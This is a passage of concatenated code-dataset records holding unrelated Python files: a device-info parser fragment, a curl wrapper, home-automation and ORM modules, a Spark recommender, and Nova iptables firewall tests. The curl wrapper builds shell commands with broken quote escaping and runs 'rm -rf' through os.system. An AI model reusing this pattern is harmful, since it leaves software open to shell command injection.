magnitude * 30\r\n\t\t\t\t\t\tif 'week' in uptimepart.lower():\r\n\t\t\t\t\t\t\ttotaluptime += magnitude * 7\r\n\t\t\t\t\t\tif 'day' in uptimepart.lower():\r\n\t\t\t\t\t\t\ttotaluptime += magnitude\r\n\t\t\t\tnewdata['last_reboot'] = (datetime.datetime.now() - datetime.timedelta(days=totaluptime)).strftime('%d/%m/%Y')\r\n\t\t\t\tnewdata['uptime'] = totaluptime\r\n\r\n\t\t\tif not newdata['software_version'] or not newdata['hardware'] or not newdata['serial_number'] \\\r\n\t\t\tor not newdata['last_reboot']:\r\n\t\t\t\tprint(hostname + ' did not find all info @ ' + source)\r\n\t\t\t\tprint(newdata)\r\n\t\t\t\tfound -= 1\r\n\t\t\t\tnotfound += 1\r\n\r\n\t\t\tnewjson[source].append(newdata)\r\n\r\n\tjsoncommands.writejson(newjson, endpath)\r\n\tprint('Found: ' + str(found))\r\n\tprint('Not Found: ' + str(notfound))\r\n\r\n\r\ndef checkregex(patterns, dataline, category, newdata):\r\n\tif 
newdata[category]:\r\n\t\treturn\r\n\tfor pattern in patterns:\r\n\t\tif re.search(pattern, dataline, re.IGNORECASE):\r\n\t\t\tresult = re.search(pattern, dataline, re.IGNORECASE).group(1)\r\n\t\t\tif not '0x' in result: # don't want hex\r\n\t\t\t\tnewdata[category] = result\r\n\t\t\t\treturn\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n\tif raw_input('Type debug to enable debug mode.\\n>') == 'debug':\r\n\t\tnow = datetime.datetime.now() - datetime.timedelta(days=1)\r\n\telse:\r\n\t\tnow = datetime.datetime.now()\r\n\r\n\ttodaydate = now.strftime('%d%m%Y')\r\n\tbackupdate = now.strftime('%d/%m/%Y')\r\n\r\n\tgetlcminfo(todaydate, backupdate)\r\n","sub_path":"getlcminfo.py","file_name":"getlcminfo.py","file_ext":"py","file_size_in_byte":4048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"87004422","text":"'''\r\nCreated on 2016-12-16\r\n\r\n@author: chinple\r\n'''\r\nimport time\r\nfrom tools.cmd.syscmd import CmdExecuter\r\nfrom libs.parser import toJsonObj, toJsonStr\r\nimport os\r\nfrom random import randint\r\n\r\nclass CurlCmdWrapper:\r\n def __init__(self, curlPath='/usr/bin/curl'):\r\n self.curlPath = curlPath\r\n\r\n def makeFormValue(self, name, value, filetype=None):\r\n if isinstance(value, dict) or isinstance(value, list):\r\n value = toJsonStr(value)\r\n return '%s=%s%s' % (name, value, '' if filetype is None else (';type=%s' % filetype))\r\n\r\n def __makeArgs(self, name, value):\r\n if (value is None or value == ''):return ''\r\n return \" %s '%s'\" % (name, str(value).replace(\"'\", \"''\"))\r\n\r\n def _makeCurlCmd(self, url, curlBody, command, headers, headerFile, isFormRequest, sslVersion):\r\n\r\n header, body, fargs = \"\", \"\", \"\"\r\n\r\n # body\r\n if isFormRequest:\r\n for fn in curlBody:\r\n body += self.__makeArgs(\"--form\", curlBody[fn])\r\n elif curlBody != '':\r\n body = self.__makeArgs(\"-d\", curlBody)\r\n\r\n # header\r\n if headers is not None:\r\n for h in headers.keys():\r\n header += self.__makeArgs(\"-H\" , \"%s:%s\" % (h, headers[h]))\r\n header += self.__makeArgs(\"-D\", headerFile)\r\n\r\n return \"{curl} {request} {ssl} '{url}' {body} {fargs} {header}\".format(curl=self.curlPath,\r\n request=self.__makeArgs('--request', command), ssl=('-k -%s' % sslVersion) if sslVersion > 0 else \"\",\r\n url=url, body=body, fargs=fargs, header=header)\r\n\r\n def _parseHeaderFile(self, headerFile):\r\n header = {}\r\n for l in open(headerFile, 'r').read().split('\\r\\n'):\r\n try:\r\n i = l.index(\":\")\r\n header[l[0:i].strip().lower()] = l[i + 1:].strip()\r\n except:pass\r\n os.system(\"rm -rf %s\" % headerFile)\r\n return header\r\n \r\n def curlByCmd(self, url, body=None, command=None, isFormRequest=False, headers=None, isRespHeader=False, isLogResp=True, logHandler=None, sslVersion=-1):\r\n headerFile = (\"header-%s-%s.txt\" % (time.time(), randint(10, 1000))) if isRespHeader else None\r\n curlcmd = self._makeCurlCmd(url, body, command, headers, headerFile, isFormRequest, sslVersion)\r\n if logHandler:\r\n logHandler(curlcmd)\r\n\r\n resp = CmdExecuter(curlcmd)\r\n if isLogResp and logHandler:\r\n logHandler(resp)\r\n try:\r\n resp = toJsonObj(str(resp))\r\n except:pass\r\n\r\n if isRespHeader:\r\n return self._parseHeaderFile(headerFile), resp\r\n else:\r\n return resp\r\n","sub_path":"tools/stool/syscmdcurl.py","file_name":"syscmdcurl.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} 
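A minimal usage sketch (not part of the dataset) for the CurlCmdWrapper class in the preceding syscmdcurl.py record; the endpoint URL, payload, and header values are assumed for illustration, and it assumes that record's tools/libs helper modules are importable:

from tools.stool.syscmdcurl import CurlCmdWrapper

curl = CurlCmdWrapper(curlPath='/usr/bin/curl')
# POST a JSON body and also capture the parsed response headers
# (isRespHeader=True makes curlByCmd return a (headers, response) pair)
headers, resp = curl.curlByCmd(
    'http://localhost:8080/api/ping',  # hypothetical endpoint
    body='{"ping": 1}',
    command='POST',
    headers={'Content-Type': 'application/json'},
    isRespHeader=True,
    logHandler=print,
)
print(headers.get('content-type'), resp)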
+{"seq_id":"636290080","text":"\"\"\"Supports the MCP3008 ADC using PiGPIO\"\"\"\n\nimport logging\n\nfrom homecontrol.dependencies.entity_types import Item\n\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass MCP3008ADC(Item):\n \"\"\"The MCP3008ADC item\"\"\"\n handle = None\n\n async def init(self) -> bool:\n \"\"\"Initialise the item\"\"\"\n self.handle = self.cfg[\"pigpio_adapter\"].pigpio.spi_open(\n spi_channel=self.cfg[\"spi_channel\"],\n baud=self.cfg[\"baud_rate\"],\n spi_flags=self.cfg[\"spi_flags\"]\n )\n\n def get_value(self, channel: int) -> int:\n \"\"\"Get the value for one channel\"\"\"\n adc = self.cfg[\"pigpio_adapter\"].pigpio.spi_xfer(\n self.handle, [1, (8 + channel) << 4, 0])[1]\n return ((adc[1] & 3) << 8) + adc[2]\n\n async def stop(self):\n \"\"\"Stop the item\"\"\"\n if self.handle is not None:\n try:\n self.cfg[\"pigpio_adapter\"].pigpio.spi_close(self.handle)\n except BrokenPipeError:\n LOGGER.warning(\"SPI transport not properly closed for %s\",\n self.identifier)\n\n\nclass AnalogInput(Item):\n \"\"\"Item that holds an analog reading\"\"\"\n async def init(self):\n \"\"\"Initialise the item\"\"\"\n self.adc = self.cfg[\"adc\"]\n self.raw_value = 0\n\n async def get_value(self) -> int:\n \"\"\"Getter for the value\"\"\"\n new_raw_value = self.adc.get_value(self.cfg[\"channel\"])\n if abs(self.raw_value - new_raw_value) >= self.cfg[\"change_threshold\"]:\n self.raw_value = new_raw_value\n return self.value(self.raw_value)\n\n def value(self, raw_val) -> int:\n \"\"\"\n Translate the raw reading\n to a range defined in the item's configuration\n \"\"\"\n return int(\n self.cfg[\"min\"]\n + raw_val * (self.cfg[\"max\"]\n - self.cfg[\"min\"]) / 1023\n + 0.5)\n","sub_path":"homecontrol/modules/mcp3008_adc/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"154132526","text":"import os\nimport re\nfrom setuptools import setup\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\n\nwith open(\"./requirements.txt\", \"r\") as f:\n requirements = []\n for line in f:\n requirements.append(line.strip())\n\n\ndef get_version(package):\n \"\"\"\n Return package version as listed in `__version__` in `init.py`.\n \"\"\"\n with open(os.path.join(package, \"__init__.py\")) as f:\n return re.search(\"__version__ = ['\\\"]([^'\\\"]+)['\\\"]\", f.read()).group(1)\n\n\ndef get_packages(package):\n \"\"\"\n Return root package and all sub-packages.\n \"\"\"\n return [\n dirpath\n for dirpath, dirnames, filenames in os.walk(package)\n if os.path.exists(os.path.join(dirpath, \"__init__.py\"))\n ]\n\n\nkeywords = \"orm async aiohttp asyncio databases database postgres sqlite\"\n\nsetup(\n name=\"duck-orm\",\n version=\"0.1.0\",\n author=\"Rich Carvalho\",\n python_requires=\">=3.8\",\n author_email=\"richelton14@gmail.com\",\n description=\"DuckORM is package is an asynchronous ORM for Python\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n packages=get_packages(\"duck_orm\"),\n install_requires=requirements,\n extras_require={\n \"postgresql\": [\"asyncpg\"],\n \"postgresql+aiopg\": [\"aiopg\"],\n \"sqlite\": [\"aiosqlite\"]\n },\n include_package_data=True,\n url=\"https://github.com/richecr/duck-orm\",\n project_urls={\n \"Código fonte\": \"https://github.com/richecr/duck-orm\",\n },\n keywords=keywords,\n 
license=\"MIT\"\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"568177666","text":"from flask_restx import Resource, fields, Namespace\n\nfrom authorization import requires_auth, requires_scope, get_all_roles\n\n\napi = Namespace('groups', description='Extra-Simple operations on groups.', path='/')\n\n\ngroup_output = api.model('GroupOutput', { 'id': fields.String() })\ngroups_output = fields.List(fields.Nested(group_output))\n\n\n@api.route('/group')\nclass GroupsResource(Resource):\n @api.doc(security='token', model=groups_output)\n @requires_auth\n # @requires_scope('read:groups')\n def get(self):\n return [\n {'id': role}\n for role\n in get_all_roles()\n ]\n","sub_path":"server/api/group.py","file_name":"group.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"21701104","text":"import re\r\nfrom itertools import permutations as perm\r\n\r\n# converting txt file of english words to set\r\nwith open('cdwords.txt', 'r') as cdwords:\r\n cdwords = cdwords.read()\r\n wordregex = re.compile('\\w+')\r\n cdwords = wordregex.findall(cdwords)\r\n cdwords = set(cdwords)\r\n\r\n\r\n# 123456789\r\ncharacters = list('ABCDEFGHI'.lower())\r\nlength = len(characters)\r\nwords = set()\r\nalphabet = set('abcdefghijklmnopqrstuvwxyz')\r\nnot_alpha = alphabet.difference(set(characters))\r\n\r\npossible = set()\r\n\r\n# Ruling out words which contain letters not in 'characters'\r\nfor word in cdwords:\r\n for letter in not_alpha:\r\n if letter in word:\r\n break\r\n else:\r\n possible.add(word)\r\n\r\n# Finding every permutation of 'characters' for each length from 1 to how many letters there are\r\nfor l in range(1, length + 1):\r\n for subset in perm(characters, l):\r\n word = ''.join(subset)\r\n words.add(word)\r\n\r\nprint(f'{len(words)} permutations possible')\r\n\r\nwords = list(words)\r\nwords.sort()\r\n\r\nresults = []\r\n\r\n# Checking which words can be created from the characters\r\nfor w in words:\r\n if w in possible:\r\n results.append(w)\r\n\r\nd = {}\r\ntotal = 0\r\n\r\n# Placing all possible words in dictionary according to their length\r\nfor l in range(1, length + 1):\r\n d[l] = []\r\n for word in results:\r\n if len(word) == l:\r\n d[l].append(word)\r\n total += len(d[l])\r\n\r\nfor l in range(length, 0, -1):\r\n print(f'{l} letter words: {d[l]}')\r\n\r\nprint(f'{total} words found')\r\n","sub_path":"cdwords.py","file_name":"cdwords.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"463297918","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\n# We need sys to get the command line arguments\nimport sys\n\n# And pyspark.sql to get the spark session\nfrom pyspark.sql import SparkSession\nfrom pyspark import SparkConf\nfrom pyspark.ml.recommendation import ALS, ALSModel\nfrom pyspark.mllib.evaluation import RankingMetrics\nfrom pyspark.sql import functions as F\n\n\ndef main(spark, train_file, test_file, rank, reg, alpha):\n '''Main routine for supervised training\n Parameters\n ----------\n spark : SparkSession object\n data_file : string, path to the parquet file to load\n model_file : string, path to store the serialized model file\n '''\n\n # Load the dataframe\n train = spark.read.parquet(train_file)\n test = 
spark.read.parquet(test_file)\n\n # Give the dataframe a temporary view so we can run SQL queries\n train.createOrReplaceTempView('train')\n test.createOrReplaceTempView('test')\n\n # Build model for input parameters\n rank = float(rank)\n reg = float(reg)\n alpha = float(alpha)\n\n als = ALS(implicitPrefs=True, userCol=\"user_idx\", itemCol=\"item_idx\", ratingCol=\"count\")\\\n .setParams(rank=rank, regParam=reg, alpha=alpha) \n model = als.fit(train)\n\n print(\"model fitted\")\n \n # Create predition and truth lists\n k = 500\n\n recommendations = model.recommendForUserSubset(test,k)\n perUserRecom = recommendations.selectExpr(\"user_idx\", \"recommendations.item_idx as prediction\")\n label_list = test.orderBy(F.col(\"user_idx\"), F.expr(\"count DESC\")).groupby(\"user_idx\").agg(F.expr(\"collect_list(item_idx) as label\"))\n perUserItem = label_list.select(\"user_idx\", \"label\")\n\n print(\"predition and label\")\n\n predictionAndLabel = perUserItem.join(perUserRecom, \"user_idx\").rdd.map(lambda row: (row.prediction, row.label))\n\n print(\"inner join\")\n\n # Use Ranking Metrics for evaluation\n metrics=RankingMetrics(predictionAndLabel)\n mean_precision = metrics.meanAveragePrecision\n\n print(\"At rank={0}, regParam={1}, alpha = {2}, mean average precision is {3}\".format(rank, reg, alpha, mean_precision))\n\n # Use only for final indexed_test.parquet\n k_precision = metrics.precisionAt(k)\n print(\"At rank={0}, regParam={1}, alpha = {2}, precision at top 500 words is {3}\".format(rank, reg, alpha, k_precision))\n\n pass\n\n\n\n# Only enter this block if we're in main\nif __name__ == \"__main__\":\n\n # Create the spark session object\n spark = SparkSession.builder.appName('als_baseline').getOrCreate()\n\n # Get the filename from the command line\n train_file = sys.argv[1]\n test_file = sys.argv[2]\n\n # get parameters\n rank = sys.argv[3]\n reg = sys.argv[4]\n alpha = sys.argv[5]\n\n # Call our main routine\n main(spark, train_file, test_file, rank, reg, alpha)\n \n","sub_path":"Music_Recommender/als_baseline.py","file_name":"als_baseline.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"99934730","text":"from modules.db_connector import *\nfrom modules.label import Label\nfrom modules.attendant import Attendant\n\nclass Connection(Base):\n __tablename__ = 'connection'\n __table_args__ = {'extend_existing':True}\n\n id = Column(Integer, primary_key=True)\n attendant_id = Column(ForeignKey('attendant.id'))\n exhibitor = Column(ForeignKey('exhibitor.id'))\n comment = Column(String)\n\n\n def __init__(self, exhibitor_id, attendant):\n self.attendant_id = attendant\n self.exhibitor = exhibitor_id\n self.comment = None\n self.labels = []\n\n def get_exhibitor(self):\n return self.exhibitor\n\n def add_comment(self, comment):\n global session\n session = Session()\n session.query(Connection).filter_by(id = self.id).update({'comment':comment})\n session.flush()\n session.commit()\n session.close()\n\n def add_label(self, label):\n global session\n session = Session()\n label_connection = Label_to_Connection(label.id, self.id)\n session.add(label_connection)\n session.commit()\n session.close()\n\n def get_labels(self):\n global session\n session = Session()\n labels = session.query(Label).join(Label_to_Connection).filter_by(connection_id=self.id).all()\n session.expunge_all()\n session.close()\n return labels\n\n def get_data(self):\n labels = self.get_labels()\n session = 
Session()\n\n        attendant = session.query(Attendant).filter_by(id=self.attendant_id).first()\n        session.expunge_all()\n        session.close()\n\n        connection_data = {\n            'comment': self.comment,\n            'labels':[],\n            'attendant': attendant.get_data(),\n            'id':self.id\n        }\n        for label in labels:\n            connection_data['labels'].append(label.get_data())\n        return connection_data\n\n\n    @classmethod\n    def get_connection(cls, connection_id):\n        global session\n        session = Session()\n        connection = session.query(Connection).filter_by(id=connection_id).first()\n        session.expunge_all()\n        session.close()\n        return connection\n\n    @classmethod\n    def get_connection_by_users(cls, exhibitor_id, attendant_id):\n        global session\n        session = Session()\n        connection = session.query(Connection).filter_by(exhibitor=exhibitor_id).filter_by(attendant_id = attendant_id).first()\n        session.expunge_all()\n        session.close()\n        return connection\n\n    @classmethod\n    def get_all_connections(cls, exhibitor_id):\n        global session\n        session = Session()\n        connections = session.query(Connection).filter_by(exhibitor=exhibitor_id).all()\n        session.close()\n        return connections\n\n    @classmethod\n    def get_every_connection(cls):\n        global session\n        session = Session()\n        result = session.query(Connection).all()\n        session.close()\n        return result\n\n\nclass Label_to_Connection(Base):\n    __tablename__ = 'label_to_connection'\n    __table_args__ = {'extend_existing':True}\n\n    label_id = Column(ForeignKey('label.id'), primary_key=True)\n    connection_id = Column(ForeignKey('connection.id'), primary_key=True)\n\n    def __init__(self, label, connection):\n        self.label_id = label\n        self.connection_id = connection\n\n\n    @classmethod\n    def remove(cls, connection_id):\n        global session\n        session = Session()\n        connections = session.query(Label_to_Connection).filter_by(connection_id=connection_id).delete()\n        session.commit()\n        session.close()\n        return connections\n","sub_path":"modules/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"415598484","text":"# Problem[2050] : Read a string of alphabet letters and convert each letter into a number from 1 to 26, then print the numbers.\n# The maximum length of the string is 200.\n\n# ASCII code : A = 65 , Z = 90\n\nstring = input()\nresult = list()\nfor i in string :\n    result.append(ord(i) - 64)\n\nresult_string = ' '.join(map(str,result))\n\nprint(result_string)","sub_path":"SWEA/D1/SWEA_2050.py","file_name":"SWEA_2050.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"530597323","text":"\"\"\"Module for the node for a binary tree\"\"\"\r\n\r\n\r\nclass BTNode:\r\n    \"\"\"Represents a node for a linked binary search tree.\"\"\"\r\n    def __init__(self, data, left=None, right=None):\r\n        \"\"\"(BTNode, str)\r\n\r\n        A new node for binary tree.\r\n        \"\"\"\r\n        self.data = data\r\n        self.left = left\r\n        self.right = right\r\n","sub_path":"btnode.py","file_name":"btnode.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"650941907","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. 
You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\nimport mock\n\nfrom nova import objects\nfrom nova import test\nfrom nova.virt import firewall\n\n_IPT_DRIVER_CLS = firewall.IptablesFirewallDriver\n_FN_INSTANCE_RULES = 'instance_rules'\n_FN_ADD_FILTERS = 'add_filters_for_instance'\n\n\nclass TestIptablesFirewallDriver(test.NoDBTestCase):\n def setUp(self):\n super(TestIptablesFirewallDriver, self).setUp()\n self.driver = _IPT_DRIVER_CLS()\n\n @mock.patch('nova.network.linux_net.iptables_manager')\n def test_constructor(self, iptm_mock):\n self.driver.__init__()\n\n self.assertEqual({}, self.driver.instance_info)\n self.assertEqual(False, self.driver.dhcp_create)\n self.assertEqual(False, self.driver.dhcp_created)\n self.assertEqual(iptm_mock, self.driver.iptables)\n\n # NOTE(jaypipes): Here we are not testing the IptablesManager\n # constructor. We are only testing the calls made against the\n # IptablesManager singleton during initialization of the\n # IptablesFirewallDriver.\n expected = [\n mock.call.add_chain('sg-fallback'),\n mock.call.add_rule('sg-fallback', '-j DROP'),\n ]\n iptm_mock.ipv4.__getitem__.return_value \\\n .assert_has_calls(expected)\n iptm_mock.ipv6.__getitem__.return_value \\\n .assert_has_calls(expected)\n\n def test_filter_defer_apply_on(self):\n with mock.patch.object(self.driver.iptables,\n 'defer_apply_on') as dao_mock:\n self.driver.filter_defer_apply_on()\n dao_mock.assert_called_once_with()\n\n def test_filter_defer_apply_off(self):\n with mock.patch.object(self.driver.iptables,\n 'defer_apply_off') as dao_mock:\n self.driver.filter_defer_apply_off()\n dao_mock.assert_called_once_with()\n\n @mock.patch.object(_IPT_DRIVER_CLS, 'remove_filters_for_instance')\n def test_unfilter_instance_valid(self, rfii_mock):\n with mock.patch.object(self.driver, 'instance_info') as ii_mock, \\\n mock.patch.object(self.driver, 'iptables') as ipt_mock:\n fake_instance = objects.Instance(id=123)\n ii_mock.pop.return_value = True\n\n self.driver.unfilter_instance(fake_instance, 'fakenetinfo')\n\n ii_mock.pop.assert_called_once_with(fake_instance.id, None)\n rfii_mock.assert_called_once_with(fake_instance)\n ipt_mock.apply.assert_called_once_with()\n\n @mock.patch.object(_IPT_DRIVER_CLS, 'remove_filters_for_instance')\n def test_unfilter_instance_invalid(self, rfii_mock):\n with mock.patch.object(self.driver, 'instance_info') as ii_mock, \\\n mock.patch.object(self.driver, 'iptables') as ipt_mock:\n fake_instance = objects.Instance(id=123)\n ii_mock.pop.return_value = False\n\n self.driver.unfilter_instance(fake_instance, 'fakenetinfo')\n\n ii_mock.pop.assert_called_once_with(fake_instance.id, None)\n self.assertFalse(rfii_mock.called)\n self.assertFalse(ipt_mock.apply.called)\n\n def setup_instance_filter(self, i_rules_mock):\n # NOTE(chenli) The IptablesFirewallDriver init method calls the\n # iptables manager, so we must reset here.\n self.driver.iptables = mock.MagicMock()\n\n i_mock = mock.MagicMock(spec=dict)\n i_mock.id = 'fake_id'\n i_rules_mock.return_value = (mock.sentinel.v4_rules,\n mock.sentinel.v6_rules)\n return i_mock\n\n @mock.patch.object(_IPT_DRIVER_CLS, _FN_ADD_FILTERS)\n 
@mock.patch.object(_IPT_DRIVER_CLS, _FN_INSTANCE_RULES)\n def test_prepare_instance_filter(self, i_rules_mock, add_filters_mock):\n i_mock = self.setup_instance_filter(i_rules_mock)\n\n self.driver.prepare_instance_filter(i_mock, mock.sentinel.net_info)\n\n i_rules_mock.assert_called_once_with(i_mock, mock.sentinel.net_info)\n add_filters_mock.assert_called_once_with(\n i_mock, mock.sentinel.net_info,\n mock.sentinel.v4_rules, mock.sentinel.v6_rules)\n self.driver.iptables.apply.assert_called_once_with()\n # When DHCP created flag is False, make sure we don't set any filters\n gi_mock = self.driver.iptables.ipv4.__getitem__.return_value\n self.assertFalse(gi_mock.called)\n\n @mock.patch.object(_IPT_DRIVER_CLS, _FN_ADD_FILTERS)\n @mock.patch.object(_IPT_DRIVER_CLS, _FN_INSTANCE_RULES)\n def test_prepare_instance_filter_with_dhcp_create(self, i_rules_mock,\n add_filters_mock):\n\n i_mock = self.setup_instance_filter(i_rules_mock)\n # add rules when DHCP create is set\n self.driver.dhcp_create = True\n\n self.driver.prepare_instance_filter(i_mock, mock.sentinel.net_info)\n\n expected = [\n mock.call.add_rule(\n 'INPUT',\n '-s 0.0.0.0/32 -d 255.255.255.255/32 '\n '-p udp -m udp --sport 68 --dport 67 -j ACCEPT'),\n mock.call.add_rule(\n 'FORWARD',\n '-s 0.0.0.0/32 -d 255.255.255.255/32 '\n '-p udp -m udp --sport 68 --dport 67 -j ACCEPT')\n ]\n self.driver.iptables.ipv4.__getitem__.return_value.assert_has_calls(\n expected)\n\n @mock.patch.object(_IPT_DRIVER_CLS, _FN_ADD_FILTERS)\n @mock.patch.object(_IPT_DRIVER_CLS, _FN_INSTANCE_RULES)\n def test_prepare_instance_filter_recreate(self, i_rules_mock,\n add_filters_mock):\n\n i_mock = self.setup_instance_filter(i_rules_mock)\n # add rules when DHCP create is set and create the rule\n self.driver.dhcp_create = True\n self.driver.prepare_instance_filter(i_mock, mock.sentinel.net_info)\n\n # Check we don't recreate the DHCP rules if we've already\n # done so (there is a dhcp_created flag on the driver that is\n # set when prepare_instance_filters() first creates them)\n self.driver.iptables.ipv4.__getitem__.reset_mock()\n self.driver.prepare_instance_filter(i_mock, mock.sentinel.net_info)\n gi_mock = self.driver.iptables.ipv4.__getitem__.return_value\n self.assertFalse(gi_mock.called)\n\n def test_create_filter(self):\n filter = self.driver._create_filter(['myip', 'otherip'], 'mychain')\n self.assertEqual(filter, ['-d myip -j $mychain',\n '-d otherip -j $mychain'])\n\n def test_get_subnets(self):\n subnet1 = {'version': '1', 'foo': 1}\n subnet2 = {'version': '2', 'foo': 2}\n subnet3 = {'version': '1', 'foo': 3}\n network_info = [{'network': {'subnets': [subnet1, subnet2]}},\n {'network': {'subnets': [subnet3]}}]\n subnets = self.driver._get_subnets(network_info, '1')\n self.assertEqual(subnets, [subnet1, subnet3])\n\n def get_subnets_mock(self, network_info, version):\n if version == 4:\n return [{'ips': [{'address': '1.1.1.1'}, {'address': '2.2.2.2'}]}]\n if version == 6:\n return [{'ips': [{'address': '3.3.3.3'}]}]\n\n def create_filter_mock(self, ips, chain_name):\n if ips == ['1.1.1.1', '2.2.2.2']:\n return 'rule1'\n if ips == ['3.3.3.3']:\n return 'rule2'\n\n def test_filters_for_instance(self):\n self.flags(use_ipv6=True)\n chain_name = 'mychain'\n network_info = {'foo': 'bar'}\n self.driver._get_subnets = mock.Mock(side_effect=self.get_subnets_mock)\n self.driver._create_filter = \\\n mock.Mock(side_effect=self.create_filter_mock)\n\n ipv4_rules, ipv6_rules = \\\n self.driver._filters_for_instance(chain_name, network_info)\n\n 
self.assertEqual(self.driver._get_subnets.mock_calls,\n            [mock.call(network_info, 4), mock.call(network_info, 6)])\n        self.assertEqual(self.driver._create_filter.mock_calls,\n            [mock.call(['1.1.1.1', '2.2.2.2'], chain_name),\n             mock.call(['3.3.3.3'], chain_name)])\n        self.assertEqual(ipv4_rules, 'rule1')\n        self.assertEqual(ipv6_rules, 'rule2')\n\n    def test_add_filters(self):\n        self.flags(use_ipv6=True)\n        self.driver.iptables.ipv4['filter'].add_rule = mock.Mock()\n        self.driver.iptables.ipv6['filter'].add_rule = mock.Mock()\n        chain_name = 'mychain'\n        ipv4_rules = ['rule1', 'rule2']\n        ipv6_rules = ['rule3', 'rule4']\n\n        self.driver._add_filters(chain_name, ipv4_rules, ipv6_rules)\n\n        self.assertEqual(self.driver.iptables.ipv4['filter'].add_rule.\n            mock_calls, [mock.call(chain_name, 'rule1'),\n            mock.call(chain_name, 'rule2')])\n        self.assertEqual(self.driver.iptables.ipv6['filter'].add_rule.\n            mock_calls, [mock.call(chain_name, 'rule3'),\n            mock.call(chain_name, 'rule4')])\n\n    @mock.patch.object(_IPT_DRIVER_CLS, '_instance_chain_name',\n                       return_value=mock.sentinel.mychain)\n    @mock.patch.object(_IPT_DRIVER_CLS, '_filters_for_instance',\n                       return_value=[mock.sentinel.ipv4_rules,\n                                     mock.sentinel.ipv6_rules])\n    @mock.patch.object(_IPT_DRIVER_CLS, '_add_filters')\n    def test_add_filters_for_instance(self, add_filters_mock,\n                                      ffi_mock, icn_mock):\n        self.flags(use_ipv6=True)\n        with mock.patch.object(self.driver.iptables.ipv6['filter'],\n                               'add_chain') as ipv6_add_chain_mock, \\\n                mock.patch.object(self.driver.iptables.ipv4['filter'],\n                                  'add_chain') as ipv4_add_chain_mock:\n\n            self.driver.add_filters_for_instance(\n                mock.sentinel.instance,\n                mock.sentinel.network_info,\n                mock.sentinel.inst_ipv4_rules,\n                mock.sentinel.inst_ipv6_rules)\n            ipv4_add_chain_mock.assert_called_with(mock.sentinel.mychain)\n            ipv6_add_chain_mock.assert_called_with(mock.sentinel.mychain)\n            icn_mock.assert_called_with(mock.sentinel.instance)\n            ffi_mock.assert_called_with(mock.sentinel.mychain,\n                                        mock.sentinel.network_info)\n            self.assertEqual([mock.call('local',\n                                        mock.sentinel.ipv4_rules,\n                                        mock.sentinel.ipv6_rules),\n                              mock.call(mock.sentinel.mychain,\n                                        mock.sentinel.inst_ipv4_rules,\n                                        mock.sentinel.inst_ipv6_rules)],\n                             add_filters_mock.mock_calls)\n\n    def test_remove_filters_for_instance(self):\n        self.flags(use_ipv6=True)\n        self.driver._instance_chain_name = \\\n            mock.Mock(return_value='mychainname')\n        self.driver.iptables.ipv4['filter'].remove_chain = mock.Mock()\n        self.driver.iptables.ipv6['filter'].remove_chain = mock.Mock()\n\n        self.driver.remove_filters_for_instance('myinstance')\n\n        self.driver._instance_chain_name.assert_called_with('myinstance')\n        self.driver.iptables.ipv4['filter'].remove_chain.assert_called_with(\n            'mychainname')\n        self.driver.iptables.ipv6['filter'].remove_chain.assert_called_with(\n            'mychainname')\n\n    def test_instance_chain_name(self):\n        instance = mock.Mock()\n        instance.id = \"myinstanceid\"\n        instance_chain_name = self.driver._instance_chain_name(instance)\n        self.assertEqual(instance_chain_name, 'inst-myinstanceid')\n","sub_path":"nova/tests/unit/virt/test_firewall.py","file_name":"test_firewall.py","file_ext":"py","file_size_in_byte":12191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"118064606","text":"\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport nibabel as nib\nimport pandas as pd\nimport json\nfrom nilearn import plotting\nfrom nilearn import image\nfrom scipy.stats import pearsonr\n\n################\n# Input/Output 
